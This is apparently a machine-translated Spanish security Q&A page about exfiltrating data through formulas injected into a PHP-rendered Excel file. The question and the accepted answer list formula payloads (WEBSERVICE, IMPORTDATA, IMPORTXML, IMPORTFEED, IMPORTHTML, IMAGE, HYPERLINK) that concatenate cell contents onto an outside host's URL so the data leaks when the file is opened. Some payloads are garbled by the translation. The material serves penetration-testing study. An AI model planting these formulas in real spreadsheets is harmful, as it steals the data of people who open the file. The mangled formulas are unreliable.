Exfiltrate los datos inyectando funciones en un archivo de Excel 2007 renderizado con PHP

Question

Exfiltrate los datos inyectando funciones en un archivo de Excel 2007 renderizado con PHP

#1 de Lucian Nitescu (1 votos)

4

Necesito extraer datos de una carpeta de Excel usando las funciones de Excel 2007.

El concepto está relacionado de alguna manera con el tipo XSS de exfiltración de datos almacenado, solo que necesito usar las funciones de Excel 2007 (que logré inyectar en las celdas del archivo) para que el usuario cargue automáticamente una imagen, ruta web o marca una solicitud de DNS.

Hasta ahora he intentado lo siguiente, pero fallaron porque el archivo de Excel se representa en PHP con funciones de Excel 2007:

=IMPORTDATA(CONCATENATE("https://example.com/", C2))
=WEBSERVICE(CONCATENATE("https://example.com/", C2))

He inyectado con éxito:

=HYPERLINK(CONCATENATE("https://example.com/",C2), "HYPERLINK HIJACKING")

Pero de esta manera tengo que engañar a un usuario para que abra el enlace por sí mismo (no es imposible, pero no es divertido: D).

injection office exfiltration excel

pregunta Lucian Nitescu 16.04.2018 - 13:26

fuente

1 respuesta

Lea otras preguntas en las etiquetas injection office exfiltration excel

¿Cifrado basado en celosía, estado actual? ¿Es seguro usar números móviles virtuales para la verificación?

score 1 · Accepted Answer

Después de algunos ensayos y errores, logré extraer datos, pero también encontré que el siguiente artículo es uno de los recursos más completos para la exfiltración de datos con la fórmula de Excel:

enlace

CONCATENAR: anexa cadenas entre sí.

= CONCATENADO (A2: E2)

IMPORTXML: importa datos de varios tipos de datos estructurados, incluidos XML, HTML, CSV, TSV y RSS y ATOM XML feeds.

= IMPORTXML (CONCAT (" enlace IP: Puerto] /123.txt?v=", CONCATENATE (A2: E2)), "/ / a / a10 ")

IMPORTFEED: importa una fuente RSS o ATOM.

= IMPORTFEED (CONCAT (" enlace IP: Puerto] // 123.txt? v=", CONCATENATE (A2: E2)))

IMPORTHTML: importa datos de una tabla o lista dentro de una página HTML.

= IMPORTHTML (CONCAT (" enlace IP: Puerto] /123.txt?v=", CONCATENATE (A2: E2)), "tabla ", 1)

IMPORTRANJA: Importa un rango de celdas de una hoja de cálculo específica.

= IMPORTRANGE (" enlace ", "sheet1! A2: E2")

IMAGEN: inserta una imagen en una celda.

= IMAGEN (" enlace IP: Puerto] /images/srpr/logo3w.png")